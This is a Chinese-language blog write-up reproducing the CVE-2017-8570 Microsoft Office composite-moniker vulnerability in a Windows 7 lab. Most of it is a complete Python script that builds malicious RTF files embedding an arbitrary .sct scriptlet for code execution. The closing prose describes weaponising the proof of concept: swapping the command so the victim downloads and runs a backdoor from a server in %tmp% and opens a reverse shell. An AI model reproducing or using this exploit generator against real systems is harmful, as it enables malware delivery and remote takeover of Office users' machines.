漏洞簡(jiǎn)介

CVE-2017-8570是繼CVE-2017-0199后Microsoft Office的又一個(gè)邏輯漏洞，又稱二代沙蟲。相比于CVE-2017-0199，利用更加方便，影響更加廣泛。

受影響的版本
Microsoft Office 2016
Microsoft Office 2013
Microsoft Office 2010
Microsoft Office 2007

實(shí)驗(yàn)環(huán)境

Microsoft Office 2010

Win7 SP1 32bit

復(fù)現(xiàn)過(guò)程(偽)

在網(wǎng)上普遍流傳的有PPSX和RTF兩個(gè)版本，前者比較廣泛，網(wǎng)上博客復(fù)現(xiàn)也是PPSX版本比較多。在CVE-2017-8570首次公開的野外樣本及漏洞分析中看到了RTF版本的利用過(guò)程以及Github上的RTF惡意文檔生成工具，腳本如下

import argparse
import os
import struct
import random
import string

class Package(object):
    """
    Packager spec based on:
    https://phishme.com/rtf-malware-delivery/
    
    Dropping method by Haifei Li: 
    https://securingtomorrow.mcafee.com/mcafee-labs/dropping-files-temp-folder-raises-security-concerns/

    Found being used itw by @MalwareParty:
    https://twitter.com/MalwareParty/status/943861021260861440
    """
    def __init__(self, filename):
        self.filename = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(15)) + '.sct'
        self.fakepath = 'C:\\fakepath\\{}'.format(self.filename)

        self.orgpath = self.fakepath
        self.datapath = self.fakepath

        with open(filename,'rb') as f:
            self.data = f.read()

        self.OBJ_HEAD = r"{\object\objemb\objw1\objh1{\*\objclass Package}{\*\objdata "
        self.OBJ_TAIL = r"0105000000000000}}"

    def get_object_header(self):
        OLEVersion = '01050000'
        FormatID = '02000000'
        ClassName = 'Package'
        szClassName = struct.pack("<I", len(ClassName) + 1).encode('hex')
        szPackageData = struct.pack("<I", len(self.get_package_data())/2).encode('hex')

        return ''.join([
            OLEVersion,
            FormatID,
            szClassName,
            ClassName.encode('hex') + '00',
            '00000000',
            '00000000',
            szPackageData,
        ])

    def get_package_data(self):  
        StreamHeader = '0200'
        Label = self.filename.encode('hex') + '00'
        OrgPath = self.orgpath.encode('hex') + '00'
        UType = '00000300'
        DataPath = self.datapath.encode('hex') + '00'
        DataPathLen = struct.pack("<I", len(self.datapath)+1).encode('hex')
        DataLen = struct.pack("<I", len(self.data)).encode('hex')
        Data = self.data.encode('hex')
        OrgPathWLen = struct.pack("<I", len(self.datapath)).encode('hex')
        OrgPathW = self.datapath.encode('utf-16le').encode('hex')
        LabelLen = struct.pack("<I", len(self.filename)).encode('hex')
        LabelW = self.filename.encode('utf-16le').encode('hex')
        DefPathWLen = struct.pack("<I", len(self.orgpath)).encode('hex')
        DefPathW = self.orgpath.encode('utf-16le').encode('hex')

        return ''.join([
            StreamHeader,
            Label,
            OrgPath,
            UType,
            DataPathLen,
            DataPath,
            DataLen,
            Data,
            OrgPathWLen,
            OrgPathW,
            LabelLen,
            LabelW,
            DefPathWLen,
            DefPathW,
        ])

    def build_package(self):
        return self.OBJ_HEAD + self.get_object_header() + self.get_package_data() + self.OBJ_TAIL

# Bypassing CVE-2017-0199 patch with Composite Moniker: https://justhaifei1.blogspot.co.uk/2017/07/bypassing-microsofts-cve-2017-0199-patch.html
EXPLOIT_RTF = r"""{{\rt{0}{{\object\objautlink\objupdate{{\*\objclass Word.Document.8}}{{\*\objdata 0105000002000000090000004F4C45324C696E6B000000000000000000000A0000D0CF11E0A1B11AE1000000000000000000000000000000003E000300FEFF0900060000000000000000000000010000000100000000000000001000000200000001000000FEFFFFFF0000000000000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFDFFFFFFFEFFFFFFFEFFFFFFFEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF52006F006F007400200045006E00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500FFFFFFFFFFFFFFFF020000000003000000000000C000000000000046000000000000000000000000704D6CA637B5D20103000000000200000000000001004F006C00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000100100000000000003004F0062006A0049006E0066006F00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000FFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000004000000060000000000000003004C0069006E006B0049006E0066006F000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000005000000B700000000000000010000000200000003000000FEFFFFFFFEFFFFFF0600000007000000FEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF010000020900000001000000000000000000000000000000C00000000903000000000000C000000000000046020000000303000000000000C00000000000004600001A00000025544D50255C{1}000E00ADDE000000000000000000000000000000000000000038000000320000000300250054004D00500025005C00{2}C6AFABEC197FD211978E0000F8757E2A000000000000000000000000000000000000000000000000FFFFFFFF0609020000000000C00000000000004600000000FFFFFFFF0000000000000000906660A637B5D201000000000000000000000000000000000000000000000000100203000D00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000105000000000000}}}}}}"""


def build_exploit(sct):
    p = Package(sct)
    package = p.build_package()
    return EXPLOIT_RTF.format(package, p.filename.encode('hex'), p.filename.encode('utf-16le').encode('hex'))

    
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="PoC exploit for CVE-2017-8750 (a.k.a. \"composite moniker\") using Packager.dll file drop method")
    parser.add_argument("-s", "--sct", help="Sct file to execute", required=True)
    parser.add_argument('-o', "--output", help="Output file for RTF", default = "example.rtf")

    args = parser.parse_args()

    with open(args.output, 'w') as f:
        f.write(build_exploit(args.sct))    
    print "[+] RTF file written to: {}".format(args.output)

復(fù)現(xiàn)并不困難，不需要像CVE-2017-0199那樣配置服務(wù)器什么的，只需要在本地構(gòu)造好命令執(zhí)行的.sct文件，再編碼并按照RTF文檔格式寫入就能夠復(fù)現(xiàn)。其實(shí)就是跟著大佬的Github上的流程走一遍(逃)

poc.sct

復(fù)現(xiàn)成功

利用過(guò)程(簡(jiǎn)單的)

思路也是和上次的CVE-2017-0199一樣，既然已經(jīng)的到了命令執(zhí)行，所以只需要將poc的calc.sct中執(zhí)行的命令改為攻擊載荷即可實(shí)現(xiàn)利用：將服務(wù)器上的后門文件下載到本地%tmp%目錄下并執(zhí)行。

poc.sct

exp.sct

解析到tmp目錄并下載后門

執(zhí)行后門文件

遠(yuǎn)程反彈Shell

寫在后面

邏輯漏洞的復(fù)現(xiàn)并沒有進(jìn)到代碼層去分析，主要就是跟著網(wǎng)上已有的利用來(lái)構(gòu)造一些簡(jiǎn)單的攻擊腳本，學(xué)了幾句vbs。在海蓮花APT團(tuán)伙利用CVE-2017-8570漏洞的新樣本及關(guān)聯(lián)分析 這篇文章中看到了更加高級(jí)的利用方式，有時(shí)間要將rtf文件的結(jié)構(gòu)看看。Github上ppsx版本的exp。